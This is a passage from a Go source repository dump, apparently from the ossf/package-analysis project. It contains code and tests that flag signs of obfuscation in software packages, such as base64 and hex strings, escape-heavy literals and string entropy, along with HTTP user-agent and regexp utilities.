eval) 20 | } 21 | 22 | func (r SingleResult) String() string { 23 | parts := []string{ 24 | fmt.Sprintf("language: %s", r.Language), 25 | fmt.Sprintf("identifiers\n%v", r.Identifiers), 26 | fmt.Sprintf("string literals\n%v", r.StringLiterals), 27 | fmt.Sprintf("integer literals\n%v", r.IntLiterals), 28 | fmt.Sprintf("float literals\n%v", r.FloatLiterals), 29 | fmt.Sprintf("comments\n%v", r.Comments), 30 | } 31 | return strings.Join(parts, "\n") 32 | } 33 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/string_regexp.go: -------------------------------------------------------------------------------- 1 | package parsing 2 | 3 | import ( 4 | "os" 5 | "regexp" 6 | 7 | "github.com/ossf/package-analysis/internal/utils" 8 | ) 9 | 10 | // General reference for matching string literals 11 | // https://blog.stevenlevithan.com/archives/match-quoted-string 12 | 13 | // https://stackoverflow.com/a/10786066 14 | var ( 15 | singleQuotedString = regexp.MustCompile(`'[^'\\]*(\\.[^'\\]*)*'`) 16 | doubleQuotedString = regexp.MustCompile(`"[^"\\]*(\\.[^"\\]*)*"`) 17 | backTickQuotedString = regexp.MustCompile("`[^`\\\\]*(\\\\.[^`\\\\]*)*`") 18 | ) 19 | 20 | // https://stackoverflow.com/a/30737232 21 | var ( 22 | singleQuotedString2 = regexp.MustCompile(`'(?:[^'\\]*(?:\\.)?)*'`) 23 | doubleQuotedString2 = regexp.MustCompile(`"(?:[^"\\]*(?:\\.)?)*"`) 24 | backTickQuotedString2 = regexp.MustCompile("`(?:[^`\\\\]*(?:\\\\.)?)*`") 25 | ) 26 | 27 | //goland:noinspection GoUnusedGlobalVariable 28 | var anyQuotedString = utils.CombineRegexp(singleQuotedString, doubleQuotedString, backTickQuotedString) 29 | 30 | //goland:noinspection GoUnusedGlobalVariable 31 | var anyQuotedString2 = utils.CombineRegexp(singleQuotedString2, doubleQuotedString2, backTickQuotedString2) 32 | 33 | type ExtractedStrings struct { 34 | RawLiterals []string 35 | Strings []string 36 | } 37 | 38 | func dequote(s string) string { 39 | if len(s) <= 2 { 40 
| return "" 41 | } else { 42 | return s[1 : len(s)-1] 43 | } 44 | } 45 | 46 | func FindStringsInCode(source string, stringRegexp *regexp.Regexp) (*ExtractedStrings, error) { 47 | allStrings := stringRegexp.FindAllString(source, -1) 48 | if allStrings == nil { 49 | return &ExtractedStrings{Strings: []string{}, RawLiterals: []string{}}, nil 50 | } 51 | 52 | unquotedStrings := utils.Transform(allStrings, dequote) 53 | return &ExtractedStrings{Strings: unquotedStrings, RawLiterals: allStrings}, nil 54 | } 55 | 56 | func FindStringsInFile(filePath string, stringRegexp *regexp.Regexp) (*ExtractedStrings, error) { 57 | fileBytes, err := os.ReadFile(filePath) 58 | if err != nil { 59 | return nil, err 60 | } 61 | fileString := string(fileBytes) 62 | return FindStringsInCode(fileString, stringRegexp) 63 | } 64 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/analyze.go: -------------------------------------------------------------------------------- 1 | package signals 2 | 3 | import ( 4 | "unicode/utf8" 5 | 6 | "github.com/ossf/package-analysis/internal/staticanalysis/parsing" 7 | "github.com/ossf/package-analysis/internal/staticanalysis/signals/detections" 8 | "github.com/ossf/package-analysis/internal/utils" 9 | "github.com/ossf/package-analysis/pkg/api/staticanalysis" 10 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 11 | "github.com/ossf/package-analysis/pkg/valuecounts" 12 | ) 13 | 14 | // countLengths returns a map containing the aggregated lengths 15 | // of each of the strings in the input list 16 | func countLengths(symbols []string) valuecounts.ValueCounts { 17 | lengths := make([]int, 0, len(symbols)) 18 | for _, s := range symbols { 19 | lengths = append(lengths, utf8.RuneCountInString(s)) 20 | } 21 | 22 | return valuecounts.Count(lengths) 23 | } 24 | 25 | // AnalyzeSingle collects signals of interest for a file in a package, operating on a single 26 | // parsing result (i.e. 
from one language parser). It returns a FileSignals object, containing 27 | // information that may be useful to determine whether the file contains malicious code. 28 | func AnalyzeSingle(parseData parsing.SingleResult) FileSignals { 29 | identifierNames := utils.Transform(parseData.Identifiers, func(i token.Identifier) string { return i.Name }) 30 | stringLiterals := utils.Transform(parseData.StringLiterals, func(s token.String) string { return s.Value }) 31 | 32 | identifierLengths := countLengths(identifierNames) 33 | stringLengths := countLengths(stringLiterals) 34 | 35 | signals := FileSignals{ 36 | IdentifierLengths: identifierLengths, 37 | StringLengths: stringLengths, 38 | Base64Strings: []string{}, 39 | HexStrings: []string{}, 40 | EscapedStrings: []staticanalysis.EscapedString{}, 41 | SuspiciousIdentifiers: []staticanalysis.SuspiciousIdentifier{}, 42 | URLs: []string{}, 43 | IPAddresses: []string{}, 44 | } 45 | 46 | for _, name := range identifierNames { 47 | for rule, pattern := range detections.SuspiciousIdentifierPatterns { 48 | if pattern.MatchString(name) { 49 | signals.SuspiciousIdentifiers = append(signals.SuspiciousIdentifiers, staticanalysis.SuspiciousIdentifier{name, rule}) 50 | break // don't bother searching for multiple matching rules 51 | } 52 | } 53 | } 54 | 55 | for _, sl := range parseData.StringLiterals { 56 | signals.Base64Strings = append(signals.Base64Strings, detections.FindBase64Substrings(sl.Value)...) 57 | signals.HexStrings = append(signals.HexStrings, detections.FindHexSubstrings(sl.Value)...) 58 | signals.URLs = append(signals.URLs, detections.FindURLs(sl.Value)...) 59 | signals.IPAddresses = append(signals.IPAddresses, detections.FindIPAddresses(sl.Value)...) 
60 | if detections.IsHighlyEscaped(sl, 8, 0.25) { 61 | escapedString := staticanalysis.EscapedString{ 62 | Value: sl.Value, 63 | Raw: sl.Raw, 64 | LevenshteinDist: sl.LevenshteinDist(), 65 | } 66 | signals.EscapedStrings = append(signals.EscapedStrings, escapedString) 67 | } 68 | } 69 | 70 | return signals 71 | } 72 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/base64.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "regexp" 5 | "strings" 6 | ) 7 | 8 | var ( 9 | // RFC4648 standard base 64 chars, padding optional, min length 16. 10 | standardBase64 = regexp.MustCompile("[[:alnum:]+/]{16,}(?:={0,2})?") 11 | // RFC4648 url/file-safe base 64 chars, padding optional, min length 16. 12 | urlSafeBase64 = regexp.MustCompile("[[:alnum:]-_]{16,}(?:={0,2})?") 13 | // Combines RFC4648 standard ('+', '/') + file-safe ('-', '_') base 64 variants. 14 | base64Regex = regexp.MustCompile(standardBase64.String() + "|" + urlSafeBase64.String()) 15 | 16 | filterRegexes = []*regexp.Regexp{ 17 | regexp.MustCompile("[[:upper:]]"), 18 | regexp.MustCompile("[[:lower:]]"), 19 | regexp.MustCompile("[G-Zg-z]"), // non-hex letter 20 | } 21 | ) 22 | 23 | /* 24 | looksLikeActualBase64 checks a candidate base64 string (that matches base64Regex) 25 | using some rule-based heuristics to reduce false positive matching of e.g. 26 | long words, hex strings, file paths. Additionally, if the candidate string 27 | uses padding, its length is checked to ensure it is a multiple of 4 as required 28 | by the Base64 standard. 
// RFC 4648 base64 matching. Both variants require a minimum run of 16
// characters from the relevant alphabet, optionally followed by up to two
// '=' padding characters.
var (
	// standard alphabet: A-Z a-z 0-9 '+' '/' (padding optional).
	standardBase64 = regexp.MustCompile("[[:alnum:]+/]{16,}={0,2}")
	// url/file-safe alphabet: A-Z a-z 0-9 '-' '_' (padding optional).
	urlSafeBase64 = regexp.MustCompile("[[:alnum:]-_]{16,}={0,2}")
	// base64Regex matches either variant.
	base64Regex = regexp.MustCompile(standardBase64.String() + "|" + urlSafeBase64.String())

	// filterRegexes are heuristics that every candidate match must satisfy;
	// they cut down false positives from long words and hex strings.
	filterRegexes = []*regexp.Regexp{
		regexp.MustCompile("[[:upper:]]"), // at least one uppercase letter
		regexp.MustCompile("[[:lower:]]"), // at least one lowercase letter
		regexp.MustCompile("[G-Zg-z]"),    // at least one non-hex letter
	}
)

/*
looksLikeActualBase64 checks a candidate base64 string (that matches
base64Regex) using rule-based heuristics to reduce false-positive matching
of e.g. long words, hex strings and file paths. Additionally, if the
candidate string uses '=' padding, its length is checked to ensure it is a
multiple of 4 as required by the Base64 standard.
*/
func looksLikeActualBase64(candidate string) bool {
	// padded strings must have a length divisible by 4
	if strings.ContainsRune(candidate, '=') && len(candidate)%4 != 0 {
		return false
	}

	// every heuristic filter must match somewhere in the candidate
	for _, r := range filterRegexes {
		if !r.MatchString(candidate) {
			return false
		}
	}

	return true
}

/*
FindBase64Substrings returns a slice containing all the non-overlapping substrings of s
that are at least 16 characters long, and look like base64-encoded data. The function
uses regex-based heuristics to determine valid substrings but does not decode the data.
In particular, valid strings must have only valid base64 characters ([A-Za-z0-9+/] or
[A-Za-z0-9-_], depending on the variant, plus up to 2 padding '=' characters).
If padding characters are included, then the string length must be a multiple of 4.

The following heuristic rules are checked to reduce the number of false positives.

 1. Must have at least one uppercase letter
 2. Must have at least one lowercase letter
 3. Must have at least one letter outside A-F (or a-f) [this filters out hex strings]
 4. If padding characters are included, the string length must be a multiple of 4

While false positive matches will occur, due to the minimum length requirement
it is highly unlikely that a legitimate base64 string will be excluded from the output.

Note that, if there are multiple base64 encoded strings in the input, depending
on how they are separated, they may end up being concatenated together into a single
string in the returned string slice.
*/
func FindBase64Substrings(s string) []string {
	// always return a non-nil slice, even when there are no matches
	matches := []string{}

	for _, candidate := range base64Regex.FindAllString(s, -1) {
		if looksLikeActualBase64(candidate) {
			matches = append(matches, candidate)
		}
	}
	return matches
}
"dGhpcyBpcyBhbiBhcHBsZQ==", []string{"dGhpcyBpcyBhbiBhcHBsZQ=="}}, 30 | {"actual base64 3 padding", "0XABCDEF12345678", []string{}}, 31 | {"long base64 string", longBase64String, []string{longBase64String}}, 32 | { 33 | "multiple base64 strings", longBase64String + " " + longBase64String, 34 | []string{longBase64String, longBase64String}, 35 | }, 36 | { 37 | "multiple base64 strings 2", longBase64String + "!!!!====!!" + longBase64String, 38 | []string{longBase64String, longBase64String}, 39 | }, 40 | } 41 | for _, tt := range tests { 42 | t.Run(tt.name, func(t *testing.T) { 43 | if got := FindBase64Substrings(tt.input); !reflect.DeepEqual(got, tt.output) { 44 | t.Errorf("FindBase64Substrings() = %v, want %v", got, tt.output) 45 | } 46 | }) 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/escape_sequences.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "regexp" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 7 | ) 8 | 9 | /* 10 | Escape sequences are defined by the regexes below. While octal, hex and 11 | short/16-bit unicode escape sequences are mostly consistent across languages, 12 | 32-bit unicode (code point) escape sequences are more variable. 13 | v1 appears in JS, PHP, Ruby while v2 appears in Python, C, Rust, Go. 14 | */ 15 | var ( 16 | octalEscape = regexp.MustCompile(`\\[0-7]{1,3}`) // e.g "\077", "\251" 17 | hexEscape = regexp.MustCompile(`\\x[[:xdigit:]]{2}`) // e.g. "\x2a", "\x3f" 18 | unicodeEscape = regexp.MustCompile(`\\u[[:xdigit:]]{4}`) // e.g. "\u00af", "\u83bd" 19 | codePointEscapeV1 = regexp.MustCompile(`\\u\{[[:xdigit:]]+}`) // e.g. "\u{1ECC2}", \u{001FFF}" 20 | codePointEscapeV2 = regexp.MustCompile(`\\U[[:xdigit:]]{8}`) // e.g. 
"\U0001ECC2", "\U00001FFF" 21 | 22 | allEscapeSequences = []*regexp.Regexp{octalEscape, hexEscape, unicodeEscape, codePointEscapeV1, codePointEscapeV2} 23 | ) 24 | 25 | /* 26 | IsHighlyEscaped returns true if a string literal exceeds the given 27 | threshold count or frequency (in range [0, 1]) of escape sequences. 28 | 29 | Supported escape sequences include: 30 | 31 | 1. Octal escape: "\251", 32 | 2. Hex escape: "\x3f", 33 | 3. Unicode 16-bit escape: "\u103a", 34 | 4. Unicode 32-bit escape: "\U00100FFF" or "\u{0100FF}". 35 | */ 36 | func IsHighlyEscaped(s token.String, thresholdCount int, thresholdFrequency float64) bool { 37 | escapeCount := 0 38 | 39 | for _, escapeSequencePattern := range allEscapeSequences { 40 | escapeCount += len(escapeSequencePattern.FindAllStringIndex(s.Raw, -1)) 41 | } 42 | 43 | length := float64(len([]rune(s.Value))) // convert to rune slice first to count codepoints, not bytes 44 | return escapeCount >= thresholdCount || float64(escapeCount)/length >= thresholdFrequency 45 | } 46 | -------------------------------------------------------------------------------- /internal/staticanalysis/signals/detections/escape_sequences_test.go: -------------------------------------------------------------------------------- 1 | package detections 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 7 | ) 8 | 9 | func TestIsHighlyEscaped(t *testing.T) { 10 | tests := []struct { 11 | name string 12 | literal token.String 13 | want bool 14 | }{ 15 | { 16 | name: "empty", 17 | literal: token.String{}, 18 | want: false, 19 | }, 20 | { 21 | name: "non escaped", 22 | literal: token.String{ 23 | Value: "the quick brown fox jumps over the lazy dog", 24 | Raw: "the quick brown fox jumps over the lazy dog", 25 | }, 26 | want: false, 27 | }, 28 | { 29 | name: "octal with readable chars", 30 | literal: token.String{ 31 | Value: "©SSTT", 32 | Raw: "\"\\251\\123\\123\\124\\124\"", 33 | }, 34 | want: true, 35 | }, 36 
// hexRegex matches runs of 8 or more consecutive hexadecimal digits.
var hexRegex = regexp.MustCompile("[[:xdigit:]]{8,}")

/*
FindHexSubstrings returns every non-overlapping substring of s made up of at
least 8 consecutive hexadecimal digits, in order of appearance. A leading
"0x" prefix is not counted as part of a match. If s contains no such run,
the result is nil.
*/
func FindHexSubstrings(s string) []string {
	matches := hexRegex.FindAllString(s, -1)
	return matches
}
// FileSignals holds information related to the presence of obfuscated code in a single file.
type FileSignals struct {
	// The following two variables respectively record how many string literals
	// and identifiers in the file have a given length. The absence of a count
	// for a particular length means that there were no symbols of that length
	// in the file.
	IdentifierLengths valuecounts.ValueCounts
	StringLengths valuecounts.ValueCounts

	// SuspiciousIdentifiers holds identifiers that are deemed 'suspicious' (i.e.
	// indicative of obfuscation) according to certain rules. Each entry contains
	// the identifier name and the name of the first rule it was matched against.
	SuspiciousIdentifiers []staticanalysis.SuspiciousIdentifier

	// EscapedStrings contains string literals with a large number of escape
	// characters, which may indicate obfuscation.
	EscapedStrings []staticanalysis.EscapedString

	// Base64Strings holds a list of (substrings of) string literals found in the
	// file that match a base64 regex pattern. This pattern has a minimum matching
	// length in order to reduce the number of false positives.
	Base64Strings []string

	// HexStrings holds a list of (substrings of) string literals found in the
	// file that contain long (>8 digits) hexadecimal digit sequences.
	HexStrings []string

	// IPAddresses contains any IP addresses found in string literals.
	IPAddresses []string

	// URLs contains any urls (http or https) found in string literals.
	URLs []string
}

// String renders the signals as a human-readable multi-line summary,
// one category per line.
func (s FileSignals) String() string {
	parts := []string{
		fmt.Sprintf("identifier length counts: %v", s.IdentifierLengths),
		fmt.Sprintf("string length counts: %v", s.StringLengths),

		fmt.Sprintf("suspicious identifiers: %v", s.SuspiciousIdentifiers),
		fmt.Sprintf("escaped strings: %v", s.EscapedStrings),
		fmt.Sprintf("potential base64 strings: %v", s.Base64Strings),
		fmt.Sprintf("hex strings: %v", s.HexStrings),
		fmt.Sprintf("IP addresses: %v", s.IPAddresses),
		fmt.Sprintf("URLs: %v", s.URLs),
	}
	return strings.Join(parts, "\n")
}
// TestSummary2 checks summary statistics of an odd-sized, unordered sample.
func TestSummary2(t *testing.T) {
	data := []int{36, 7, 40, 41, 6, 42, 43, 47, 49, 15, 39}
	actual := Summarise(data)
	expected := SampleStatistics{
		Size:      11,
		Mean:      33.18181818181818,
		Variance:  251.9636363636363,
		Skewness:  -1.0634150819204964,
		Quartiles: [5]float64{6, 15, 40, 43, 49},
	}
	if !actual.Equals(expected, 1e-4) {
		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
	}
}

// TestSummary3 checks an even-sized sample, where the median is interpolated.
func TestSummary3(t *testing.T) {
	data := []int{36, 40, 7, 39, 15, 41}
	actual := Summarise(data)
	expected := SampleStatistics{
		Size:      6,
		Mean:      29.666666666666668,
		Variance:  218.26666666666665,
		Skewness:  -1.039599522561593,
		Quartiles: [5]float64{7, 15, 37.5, 40, 41},
	}
	if !actual.Equals(expected, 1e-4) {
		t.Errorf("Expected summary: %v\nactual summary: %v\n", expected, actual)
	}
}

// TestSummary4 checks the empty-sample edge case: all statistics are NaN.
// (SampleStatistics.Equals treats NaN as equal to NaN.)
func TestSummary4(t *testing.T) {
	var data []int
	actual := Summarise(data)
	nan := math.NaN()
	expected := SampleStatistics{
		Size:      0,
		Mean:      nan,
		Variance:  nan,
		Skewness:  nan,
		Quartiles: [5]float64{nan, nan, nan, nan, nan},
	}
	if !actual.Equals(expected, 1e-4) {
		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
	}
}

// TestSummary5 checks a single-element sample: variance and skewness are
// undefined (NaN), all quartiles equal the element.
func TestSummary5(t *testing.T) {
	data := []float64{1.5}
	actual := Summarise(data)
	nan := math.NaN()
	expected := SampleStatistics{
		Size:      1,
		Mean:      1.5,
		Variance:  nan,
		Skewness:  nan,
		Quartiles: [5]float64{1.5, 1.5, 1.5, 1.5, 1.5},
	}
	if !actual.Equals(expected, 1e-4) {
		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
	}
}

// TestSummary6 checks a two-element sample: skewness is still undefined.
func TestSummary6(t *testing.T) {
	data := []float64{1.5, 2.5}
	actual := Summarise(data)
	nan := math.NaN()
	expected := SampleStatistics{
		Size:      2,
		Mean:      2.0,
		Variance:  0.5,
		Skewness:  nan,
		Quartiles: [5]float64{1.5, 1.5, 2.0, 2.5, 2.5},
	}
	if !actual.Equals(expected, 1e-4) {
		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
	}
}

// TestSummary7 checks a symmetric sample containing negative values:
// skewness is exactly zero.
func TestSummary7(t *testing.T) {
	data := []float64{-12.5, 0, 12.5}
	actual := Summarise(data)
	expected := SampleStatistics{
		Size:      3,
		Mean:      0.0,
		Variance:  156.25,
		Skewness:  0,
		Quartiles: [5]float64{-12.5, -12.5, 0.0, 12.5, 12.5},
	}
	if !actual.Equals(expected, 1e-4) {
		t.Errorf("Expected summary: %v\nactual summary %v\n", expected, actual)
	}
}
/*
Calculate finds the entropy of a string S of characters over an alphabet A, which is defined as

	E(S) = - sum(i in A) { (p(i)) * log(p(i)) },

where p(i) is the probability of observing character i, and the summation is performed over all characters in A.
If S is the empty string, we define E(S) to be 0.

The probabilities p(i) can be given a priori, or simply calculated by counting characters within the string S.
In the latter case, we have p(i) = c(i) / |S|, where c(i) counts the number of times character i appears in S,
and |S| is the length of S.

NOTE(review): the loop below adds -p(char) * log(p(char)) once per *occurrence*
of each character in S, so a character occurring c times contributes
c * p * log(p) rather than the single p * log(p) term of the formula above.
The two agree only when no character repeats — confirm whether this per-occurrence
weighting is intentional before relying on absolute entropy values.

Reference: https://link.springer.com/chapter/10.1007/978-3-642-10509-8_19
*/
func Calculate(s string, prob map[rune]float64) float64 {
	if len(s) == 0 {
		return 0
	}

	// no probabilities supplied: derive them from the string itself
	if prob == nil {
		counts, sumCounts := CharacterCounts([]string{s})
		prob = characterProbabilitiesFromCounts(counts, sumCounts)
	}

	entropy := 0.0
	for _, char := range s {
		p := prob[char]
		// characters with zero probability contribute nothing (and would
		// produce log(0) otherwise)
		if p > 0 {
			entropy -= p * math.Log(p)
		}
	}

	return entropy
}

/*
CalculateNormalised returns the string entropy normalised by the log of the length of the string.
This quantity is used because log(N) is the maximum possible entropy out of all strings with length N,
where N > 0. Special cases are empty strings (0) and single character strings (1).
As a formula:

	E_n(S) := {
	    0, if |S| = 0
	    1, if |S| = 1
	    E(S) / log(|S|), otherwise
	}
*/
// TODO does this make sense when a general probability structure is used?
// TODO calculate max string entropy for a given set of character counts.
func CalculateNormalised(s string, prob map[rune]float64) float64 {
	// length is measured in runes (codepoints), matching how Calculate
	// iterates over the string
	length := utf8.RuneCountInString(s)
	switch length {
	case 0:
		return 0
	case 1:
		return 1
	default:
		return Calculate(s, prob) / math.Log(float64(length))
	}
}

// CharacterCounts computes a map of character (rune) to number of occurrences
// across all the input strings, along with the total number of runes counted.
func CharacterCounts(strs []string) (map[rune]int, int64) {
	counts := make(map[rune]int)
	var sumCounts int64 = 0
	for _, s := range strs {
		for _, b := range s {
			counts[b] += 1
			sumCounts += 1
		}
	}
	return counts, sumCounts
}

// CharacterProbabilities computes a map of character (rune) to
// frequency/probability of occurrence across all the input strings.
func CharacterProbabilities(strs []string) map[rune]float64 {
	counts, sumCounts := CharacterCounts(strs)
	return characterProbabilitiesFromCounts(counts, sumCounts)
}

// characterProbabilitiesFromCounts converts per-character occurrence counts
// into probabilities by dividing each count by the total count.
func characterProbabilitiesFromCounts(counts map[rune]int, sumCounts int64) map[rune]float64 {
	prob := make(map[rune]float64, len(counts))
	for char, count := range counts {
		prob[char] = float64(count) / float64(sumCounts)
	}
	return prob
}
11 | Basic Task = "basic" 12 | 13 | // Parsing analysis involves using a programming language parser to extract 14 | // source code information from the file. 15 | Parsing Task = "parsing" 16 | 17 | // Signals analysis involves using applying certain detection rules to extract 18 | // signals of interest from the code. It depends on the output of the Parsing task, 19 | // and does not require reading files directly. 20 | Signals Task = "signals" 21 | 22 | // All is not a task itself, but represents/'depends on' all other tasks. 23 | All Task = "all" 24 | ) 25 | 26 | var allTasks = []Task{ 27 | Basic, 28 | Parsing, 29 | Signals, 30 | } 31 | 32 | func AllTasks() []Task { 33 | return allTasks[:] 34 | } 35 | 36 | func TaskFromString(s string) (Task, bool) { 37 | switch Task(s) { 38 | case Basic: 39 | return Basic, true 40 | case Parsing: 41 | return Parsing, true 42 | case Signals: 43 | return Signals, true 44 | case All: 45 | return All, true 46 | default: 47 | return "", false 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /internal/useragent/useragent.go: -------------------------------------------------------------------------------- 1 | package useragent 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | const defaultUserAgentFmt = "package-analysis (github.com/ossf/package-analysis%s)" 9 | 10 | type uaRoundTripper struct { 11 | parent http.RoundTripper 12 | userAgent string 13 | } 14 | 15 | // RoundTrip implements the http.RoundTripper interface. 16 | func (rt *uaRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) { 17 | req.Header.Set("User-Agent", rt.userAgent) 18 | return rt.parent.RoundTrip(req) 19 | } 20 | 21 | // RoundTripper wraps parent with a RoundTripper that add a user-agent header 22 | // with the contents of ua. 
23 | func RoundTripper(ua string, parent http.RoundTripper) http.RoundTripper { 24 | return &uaRoundTripper{ 25 | parent: parent, 26 | userAgent: ua, 27 | } 28 | } 29 | 30 | // DefaultRoundTripper wraps parent with a RoundTripper that adds a default 31 | // Package Analysis user-agent header. 32 | // 33 | // If supplied, extra information can be added to the user-agent, allowing the 34 | // user-agent to be customized for production environments. 35 | func DefaultRoundTripper(parent http.RoundTripper, extra string) http.RoundTripper { 36 | if extra != "" { 37 | extra = ", " + extra 38 | } 39 | return RoundTripper(fmt.Sprintf(defaultUserAgentFmt, extra), parent) 40 | } 41 | -------------------------------------------------------------------------------- /internal/useragent/useragent_test.go: -------------------------------------------------------------------------------- 1 | package useragent_test 2 | 3 | import ( 4 | "net/http" 5 | "net/http/httptest" 6 | "testing" 7 | 8 | "github.com/ossf/package-analysis/internal/useragent" 9 | ) 10 | 11 | func TestRoundTripper(t *testing.T) { 12 | want := "test user agent string" 13 | ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 14 | got := r.Header.Get("user-agent") 15 | if got != want { 16 | t.Errorf("User Agent = %q, want %q", got, want) 17 | } 18 | w.WriteHeader(http.StatusOK) 19 | })) 20 | defer ts.Close() 21 | 22 | c := http.Client{ 23 | Transport: useragent.RoundTripper(want, http.DefaultTransport), 24 | } 25 | resp, err := c.Get(ts.URL) 26 | if err != nil { 27 | t.Fatalf("Get() = %v; want no error", err) 28 | } 29 | if resp.StatusCode != http.StatusOK { 30 | t.Fatalf("Get() status = %v; want 200", resp.StatusCode) 31 | } 32 | } 33 | 34 | func TestDefaultRoundTripper(t *testing.T) { 35 | want := "package-analysis (github.com/ossf/package-analysis, extra)" 36 | ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 37 | got := 
r.Header.Get("user-agent") 38 | if got != want { 39 | t.Errorf("User Agent = %q, want %q", got, want) 40 | } 41 | w.WriteHeader(http.StatusOK) 42 | })) 43 | defer ts.Close() 44 | 45 | c := http.Client{ 46 | Transport: useragent.DefaultRoundTripper(http.DefaultTransport, "extra"), 47 | } 48 | resp, err := c.Get(ts.URL) 49 | if err != nil { 50 | t.Fatalf("Get() = %v; want no error", err) 51 | } 52 | if resp.StatusCode != http.StatusOK { 53 | t.Fatalf("Get() status = %v; want 200", resp.StatusCode) 54 | } 55 | } 56 | 57 | func TestDefaultRoundTripper_NoExtra(t *testing.T) { 58 | want := "package-analysis (github.com/ossf/package-analysis)" 59 | ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { 60 | got := r.Header.Get("user-agent") 61 | if got != want { 62 | t.Errorf("User Agent = %q, want %q", got, want) 63 | } 64 | w.WriteHeader(http.StatusOK) 65 | })) 66 | defer ts.Close() 67 | 68 | c := http.Client{ 69 | Transport: useragent.DefaultRoundTripper(http.DefaultTransport, ""), 70 | } 71 | resp, err := c.Get(ts.URL) 72 | if err != nil { 73 | t.Fatalf("Get() = %v; want no error", err) 74 | } 75 | if resp.StatusCode != http.StatusOK { 76 | t.Fatalf("Get() status = %v; want 200", resp.StatusCode) 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /internal/utils/combine_regexp.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "regexp" 5 | "strings" 6 | ) 7 | 8 | // CombineRegexp creates a single regexp by joining the argument regexps together 9 | // using the | operator. Each regexp is put into a separate non-capturing group before 10 | // being combined. 
11 | func CombineRegexp(regexps ...*regexp.Regexp) *regexp.Regexp { 12 | patterns := Transform(regexps, func(r *regexp.Regexp) string { 13 | // create a non-capturing group for each regexp 14 | return "(?:" + r.String() + ")" 15 | }) 16 | return regexp.MustCompile(strings.Join(patterns, "|")) 17 | } 18 | -------------------------------------------------------------------------------- /internal/utils/combine_regexp_test.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "reflect" 5 | "regexp" 6 | "testing" 7 | ) 8 | 9 | type combineRegexpTestCase struct { 10 | name string 11 | regexps []*regexp.Regexp 12 | want *regexp.Regexp 13 | } 14 | 15 | func TestCombineRegexp(t *testing.T) { 16 | tests := []combineRegexpTestCase{ 17 | { 18 | name: "a b c", 19 | regexps: []*regexp.Regexp{ 20 | regexp.MustCompile("a"), 21 | regexp.MustCompile("b"), 22 | regexp.MustCompile("c"), 23 | }, 24 | want: regexp.MustCompile("(?:a)|(?:b)|(?:c)"), 25 | }, 26 | { 27 | name: "capturing groups", 28 | regexps: []*regexp.Regexp{ 29 | regexp.MustCompile("([0-9])"), 30 | regexp.MustCompile("([a-z])"), 31 | regexp.MustCompile("([A-Z])"), 32 | }, 33 | want: regexp.MustCompile("(?:([0-9]))|(?:([a-z]))|(?:([A-Z]))"), 34 | }, 35 | { 36 | name: "conjunction and capturing groups", 37 | regexps: []*regexp.Regexp{ 38 | regexp.MustCompile("(apple|pear)"), 39 | regexp.MustCompile("(red|blue)"), 40 | regexp.MustCompile("(up|down)"), 41 | }, 42 | want: regexp.MustCompile("(?:(apple|pear))|(?:(red|blue))|(?:(up|down))"), 43 | }, 44 | { 45 | name: "quantification", 46 | regexps: []*regexp.Regexp{ 47 | regexp.MustCompile("[!@#$%^&*()]{1, 30}"), 48 | regexp.MustCompile("\\s+"), 49 | regexp.MustCompile("[[:xdigit:]]?"), 50 | }, 51 | want: regexp.MustCompile("(?:[!@#$%^&*()]{1, 30})|(?:\\s+)|(?:[[:xdigit:]]?)"), 52 | }, 53 | { 54 | name: "combine regexps with quantifications", 55 | regexps: []*regexp.Regexp{ 56 | 
regexp.MustCompile("(apple|pear)"), 57 | regexp.MustCompile("(red|blue)"), 58 | regexp.MustCompile("(up|down)"), 59 | }, 60 | want: regexp.MustCompile("(?:(apple|pear))|(?:(red|blue))|(?:(up|down))"), 61 | }, 62 | } 63 | for _, tt := range tests { 64 | t.Run(tt.name, func(t *testing.T) { 65 | if got := CombineRegexp(tt.regexps...); !reflect.DeepEqual(got, tt.want) { 66 | t.Errorf("CombineRegexp() = %v, want %v", got, tt.want) 67 | } 68 | }) 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /internal/utils/comma_separated_flags.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "flag" 5 | "strings" 6 | ) 7 | 8 | // CommaSeparatedFlags creates a struct which can be used with the Golang flag library, 9 | // to allow passing a comma-separated list of strings as a single command-line argument. 10 | // 11 | // Make sure to call InitFlag() on the returned struct before calling flag.Parse(). 
